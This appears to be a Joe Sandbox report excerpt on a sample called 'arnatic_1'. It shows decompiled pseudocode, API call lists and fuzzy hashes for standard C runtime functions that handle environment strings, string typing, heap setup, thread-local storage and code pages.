GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004025F9), ref: 0040391A
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004025F9), ref: 0040392E
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004025F9), ref: 0040395A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004025F9), ref: 00403992
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004025F9), ref: 004039B4
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004025F9), ref: 004039CD
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004025F9), ref: 004039E0
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A1E

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: a2405a9546c2836c136a8ce12d54c7da7d13601d440ee334c383526e4e76231e
Instruction ID: b6725041d1b54200f0d21bd0163dfbbbb12a17af93570b461bcfb34acae37640
Opcode Fuzzy Hash: a2405a9546c2836c136a8ce12d54c7da7d13601d440ee334c383526e4e76231e
Instruction Fuzzy Hash: EA3106F2A08211AFD7207FB95CC483BBE9CE64535A711063BF581F3280E6B99E41C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406776, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406776(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x407780);
				_push(E00403DC8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x40c0f8; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x40c0ec; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E004026A0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00406310(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x40c0dc; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x407760, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40775c, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x40c0f8 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x00406779
0x0040677b
0x00406780
0x0040678b
0x0040678c
0x00406793
0x00406799
0x0040679c
0x004067a5
0x004067e5
0x004067e8
0x00406811
0x00000000
0x00406817
0x0040681a
0x0040681c
0x00406821
0x00406821
0x00406831
0x0040683b
0x00406841
0x00406846
0x00000000
0x00406848
0x00406848
0x00406855
0x0040685a
0x0040685d
0x0040685f
0x00406865
0x0040687a
0x00406880
0x00000000
0x00406882
0x00406891
0x00406899
0x00000000
0x0040689b
0x004068a3
0x004068a3
0x00406899
0x00406880
0x00406846
0x004067ea
0x004067ea
0x004067ef
0x004067f1
0x004067f1
0x00406803
0x00406803
0x004067a7
0x004067aa
0x004067ad
0x004067bd
0x004067d7
0x004068ab
0x004068ab
0x004067dd
0x004067df
0x00000000
0x004067df
0x004067bf
0x004067bf
0x004067e0
0x004067e0
0x00000000
0x004067e0
0x004067bd
0x004068b3
0x004068be

APIs

GetStringTypeW.KERNEL32(00000001,00407760,00000001,?,74E070F0,0040C24C,?,?,00406919,?,?,?,00000000,00000001), ref: 004067B5
GetStringTypeA.KERNEL32(00000000,00000001,0040775C,00000001,?,?,00406919,?,?,?,00000000,00000001), ref: 004067CF
GetStringTypeA.KERNEL32(?,?,?,?,00406919,74E070F0,0040C24C,?,?,00406919,?,?,?,00000000,00000001), ref: 00406803
MultiByteToWideChar.KERNEL32(?,0040C24D,?,?,00000000,00000000,74E070F0,0040C24C,?,?,00406919,?,?,?,00000000,00000001), ref: 0040683B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406919,?), ref: 00406891
GetStringTypeW.KERNEL32(?,?,00000000,00406919,?,?,?,?,?,?,00406919,?), ref: 004068A3

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 43fe9836a7dc7c83c3cc826584333e3bab1bc5b767ca711a1b5b9c4416403b2f
Instruction ID: a809a5b280c6af6b9ebdb22818edb07a859e17d2cf1dfd7cae1ddfd1faad96f0
Opcode Fuzzy Hash: 43fe9836a7dc7c83c3cc826584333e3bab1bc5b767ca711a1b5b9c4416403b2f
Instruction Fuzzy Hash: 56418D72900219EFDF209F94CD85EAF7B68EF04750F118936F912F2290C3399965DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C1A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00403C1A(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E004026A0(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00403BED( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00406140("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004060C0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00406000(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E00405DC5(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}

0x00403c22
0x00403c2f
0x00403c41
0x00403c57
0x00000000
0x00403c57
0x00403c76
0x00403d4c
0x00403d50
0x00403d5a
0x00000000
0x00403d5c
0x00403c7e
0x00403c8a
0x00403c8c
0x00403c8c
0x00403c90
0x00403c98
0x00403c98
0x00403c9a
0x00403c9b
0x00403c8c
0x00403cb7
0x00403cce
0x00403cda
0x00403ce0
0x00403ce2
0x00403ce2
0x00403ce6
0x00403cee
0x00403cee
0x00403cf0
0x00403cf1
0x00403ce2
0x00403d03
0x00403cb9
0x00403cb9
0x00403cb9
0x00403d0c
0x00000000
0x00000000
0x00403d11
0x00403d1a
0x00000000
0x00000000
0x00403d1c
0x00403d1d
0x00403d21
0x00403d23
0x00403d26
0x00403d2c
0x00403d28
0x00403d28
0x00403d28
0x00403d2d
0x00403d23
0x00403d35
0x00403d40
0x00000000
0x00000000
0x00403d61

APIs

GetVersionExA.KERNEL32 ref: 00403C39
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403C6E
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403CCE

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 00403CA8
__MSVCRT_HEAP_SELECT, xrefs: 00403C69

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: 89032f3dcdd0b383c6c013e8218e5be628be617afebe3ec3d0f2530b6fe241da
Instruction ID: dc9441f34fa564392e89366e1ef29ab87b1cab9de9b7694dab18d65dbaa81319
Opcode Fuzzy Hash: 89032f3dcdd0b383c6c013e8218e5be628be617afebe3ec3d0f2530b6fe241da
Instruction Fuzzy Hash: FD31D5729092886EFB319F705C45BDA3F6C9B02709F2404FBD145FA2C3D6399B858B19

Uniqueness

Uniqueness Score: -1.00%

Function 00403243, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403243() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x4090c0);
				if(_t16 == 0) {
					_t16 = E004053D5(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x4090c0, _t16) == 0) {
						E00402654(0x10);
					} else {
						E00403230(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00403251
0x00403259
0x0040325d
0x00403268
0x0040326e
0x00403298
0x00403281
0x00403282
0x00403288
0x0040328e
0x00403292
0x00403292
0x0040326e
0x0040329f
0x004032a9

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,004068C4,00405F93,00000000,?,?,00000000,00000001), ref: 00403245
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00403253
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0040329F

Part of subcall function 004053D5: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00403268,00000001,00000074,?,?,00000000,00000001), ref: 004054CB

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00403277
GetCurrentThreadId.KERNEL32 ref: 00403288

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 30660e08b774b625308cb5dc3e87959fb7b878b828be0632a8f7dee987013cd0
Instruction ID: 8b2ddff1a4fab8b3f988331233e40a94790441edc5c5b6ac7eff498943735efc
Opcode Fuzzy Hash: 30660e08b774b625308cb5dc3e87959fb7b878b828be0632a8f7dee987013cd0
Instruction Fuzzy Hash: 65F0F6319053219BD6302F31BE0D61B3F64AB017B2710027FF945B62D1CB7888018669

Uniqueness

Uniqueness Score: -1.00%

Function 00404A09, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00404A09() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x4092e0 != 0xffffffff) {
					_t43 = HeapAlloc( *0x40c4a4, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x4092d0;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x4092d0) {
							HeapFree( *0x40c4a4, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x4092d0) {
						 *_t43 = 0x4092d0;
						_t25 =  *0x4092d4; // 0x4092d0
						 *(_t43 + 4) = _t25;
						 *0x4092d4 = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x4092d0 == 0) {
							 *0x4092d0 = 0x4092d0;
						}
						if( *0x4092d4 == 0) {
							 *0x4092d4 = 0x4092d0;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00406310(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x00404a14
0x00404a30
0x00404a34
0x00000000
0x00000000
0x00000000
0x00404a16
0x00404a16
0x00404a3a
0x00404a50
0x00404a54
0x00404b2f
0x00404b35
0x00404b40
0x00404b40
0x00404b46
0x00000000
0x00404b46
0x00404a6c
0x00404b29
0x00000000
0x00404b29
0x00404a79
0x00404a99
0x00404a9b
0x00404aa0
0x00404aa3
0x00404aac
0x00404a7b
0x00404a82
0x00404a84
0x00404a84
0x00404a90
0x00404a92
0x00404a92
0x00404a90
0x00404aae
0x00404ab4
0x00404aba
0x00404abd
0x00404abd
0x00404ac0
0x00404ac3
0x00404ac6
0x00404ac9
0x00404ad0
0x00404ad2
0x00404adc
0x00404add
0x00404adf
0x00404ae2
0x00404ae5
0x00404af1
0x00404af9
0x00404b02
0x00404b09
0x00404b0c
0x00404b0e
0x00404b15
0x00404b15
0x00000000
0x00404b1d

APIs

HeapAlloc.KERNEL32(00000000,00002020,004092D0,004092D0,?,?,00404ED5,00000000,00000010,00000000,00000009,00000009,?,00402921,00000010,00000000), ref: 00404A2A
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00404ED5,00000000,00000010,00000000,00000009,00000009,?,00402921,00000010,00000000), ref: 00404A4E
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00404ED5,00000000,00000010,00000000,00000009,00000009,?,00402921,00000010,00000000), ref: 00404A68
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00404ED5,00000000,00000010,00000000,00000009,00000009,?,00402921,00000010,00000000,?), ref: 00404B29
HeapFree.KERNEL32(00000000,00000000,?,?,00404ED5,00000000,00000010,00000000,00000009,00000009,?,00402921,00000010,00000000,?,00000000), ref: 00404B40

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: fdd60501bda957a774db6a18b5d03932d6c1e769c9a515ce786892c0b73b3d09
Instruction ID: 50ec685ed2e4df8c03d225d0eb1bbc80041cc39832f2beb6b4c83103fe8b3563
Opcode Fuzzy Hash: fdd60501bda957a774db6a18b5d03932d6c1e769c9a515ce786892c0b73b3d09
Instruction Fuzzy Hash: 6731E2B0681702AFD3308F28ED41B22B7A4EB84755F14463EE655B73E1E778A840CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004058EE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004058EE(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x40c250,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00406776(1,  &_v280, 0x100,  &_v1304,  *0x40c250,  *0x40c484, 0);
						E00406527( *0x40c484, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x40c250, 0);
						E00406527( *0x40c484, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x40c250, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x40c280) =  *(_t55 + 0x40c280) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x40c381) =  *(_t55 + 0x40c381) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x40c280) = _t77;
								goto L16;
							}
							 *(_t55 + 0x40c381) =  *(_t55 + 0x40c381) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x40c280) =  *(_t43 + 0x40c280) & 0x00000000;
						} else {
							 *(_t43 + 0x40c381) =  *(_t43 + 0x40c381) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x40c381) =  *(_t43 + 0x40c381) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x40c280) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x0040590b
0x00405911
0x00405918
0x00405918
0x0040591f
0x00405920
0x00405924
0x00405927
0x00405930
0x00405969
0x00405988
0x004059ac
0x004059d4
0x004059dc
0x004059de
0x004059e4
0x004059e4
0x004059ea
0x00405a05
0x00405a17
0x00000000
0x00405a17
0x00405a07
0x00405a0e
0x004059fa
0x004059fa
0x00000000
0x004059fa
0x004059ec
0x004059f3
0x00000000
0x00405a1e
0x00405a1e
0x00405a20
0x00405a21
0x00000000
0x004059e4
0x00405934
0x00405937
0x00405937
0x0040593a
0x0040593f
0x00405943
0x0040594a
0x00405952
0x0040595c
0x0040595c
0x0040595c
0x0040595f
0x00405960
0x00405963
0x00000000
0x00405968
0x00405a27
0x00405a2e
0x00405a31
0x00405a4f
0x00405a64
0x00405a56
0x00405a56
0x00405a5f
0x00000000
0x00405a5f
0x00405a38
0x00405a38
0x00405a41
0x00405a44
0x00405a44
0x00405a44
0x00405a6b
0x00405a6c
0x00405a72

APIs

GetCPInfo.KERNEL32(?), ref: 00405902

Strings

, xrefs: 00405927
, xrefs: 0040594B

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 7afea5f8559246f0b7ef3ae46e8d917eb3c5e7517dc2cf51d1e37aac8ce3f264
Instruction ID: 988568ab03d869404924205d71ac879e9746d7290e329e3519b37f082624b43d
Opcode Fuzzy Hash: 7afea5f8559246f0b7ef3ae46e8d917eb3c5e7517dc2cf51d1e37aac8ce3f264
Instruction Fuzzy Hash: A3419C315006589AEB119764DDD9BFB3F98EB06700F1402FAD949F71D2C2394A08DFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402714, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402714(void* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				long _v32;
				void _v36;
				DWORD* _t14;
				signed int _t15;

				_t15 = 8;
				_v12 = memcpy( &_v36, 0x407320, _t15 << 2);
				_v8 = _a8;
				_t14 =  &_v16;
				_t8 =  &_v20; // 0x407a40
				RaiseException(_v36, _v32,  *_t8, _t14);
				return _t14;
			}

0x00402721
0x0040272c
0x00402732
0x00402735
0x00402739
0x00402742
0x0040274b

APIs

RaiseException.KERNEL32(020911A0,?,@z@,?,00000000,00000000,?,?,00402092,?,00407A40,?,?,00000000), ref: 00402742

Strings

s@, xrefs: 00402722
@z@, xrefs: 00402739

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: ExceptionRaise
String ID: s@$@z@
API String ID: 3997070919-2069013633
Opcode ID: c186ce62456ba9c308c90d363217dbb2d492196e78564a350322cd0409eb20d7
Instruction ID: 7135e4030d8d224f0a9e4ace0b2c178dc81e08dd4a73b5d15f9d5e9aec8aadde
Opcode Fuzzy Hash: c186ce62456ba9c308c90d363217dbb2d492196e78564a350322cd0409eb20d7
Instruction Fuzzy Hash: EDE0E536D0011CABCF01DF99DC448EEBBB9FB48310F008066FA14BB150D774AA15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040485D, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040485D() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x40c498; // 0x0
				_t26 =  *0x40c488; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x40c49c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x40c4a4, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x40c498 =  *0x40c498 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x40c4a4, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x40c4a4, 0,  *0x40c49c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x40c488 =  *0x40c488 + 0x10;
				 *0x40c49c = _t25;
				_t15 =  *0x40c498; // 0x0
				goto L3;
			}

0x0040485d
0x00404862
0x0040486e
0x004048a0
0x004048a0
0x004048b6
0x004048b9
0x004048c1
0x004048c4
0x004048f0
0x00000000
0x004048f0
0x004048d3
0x004048db
0x004048de
0x004048f4
0x004048f8
0x004048fa
0x004048fd
0x00404906
0x00000000
0x00404909
0x004048ea
0x00000000
0x004048ea
0x00404870
0x00404885
0x0040488d
0x00000000
0x00000000
0x0040488f
0x00404896
0x0040489b
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00404625,00000000,00000000,00000000,004028C3,00000000,00000000,?,00000000,00000000,00000000), ref: 00404885
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00404625,00000000,00000000,00000000,004028C3,00000000,00000000,?,00000000,00000000,00000000), ref: 004048B9
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004048D3
HeapFree.KERNEL32(00000000,?), ref: 004048EA

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
